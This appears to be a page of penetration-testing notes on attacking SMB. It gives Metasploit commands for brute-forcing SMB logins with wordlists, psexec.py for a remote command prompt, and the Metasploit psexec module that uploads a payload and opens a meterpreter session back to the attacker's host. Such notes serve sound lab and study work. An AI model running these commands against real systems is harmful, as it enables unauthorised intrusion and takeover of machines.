Brute force and Login

Brute force with metasploit

Use Metasploit smb_login module to brute force SMB
- The brute force success is based on the user list and password list used.

use auxiliary/scanner/smb/smb_login
set RHOSTS <TARGET_IP>
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set VERBOSE false
run

Authentication with psExec.py

Use PsExec.py script for Linux (from the impacket-scripts) to get a command prompt on the target machine, with the Administrator account.
- Using this technique, no exploit is launched or uploaded on the target system.
- It is a legitimate authentication with the actual credentials and the use of an official tool (psexec).

psexec.py username@ip address cmd.exe

Authentication with metasploit Psexec module

Alternatively to the Python script, use Metasploit psexec module to get a meterpreter session on the target system.
- This technique will upload and run a (malicious) payload on the target. Pay attention to the antivirus!

msfconsole
search psexec
use exploit/windows/smb/psexec
set RHOSTS <target ip>
set SMBUser username
set SMBPass password
set LHOST = your host IP address
set LPORT = port you want 
exploit

PreviousSMB NextEternal blue vulnerability

Last updated 1 year ago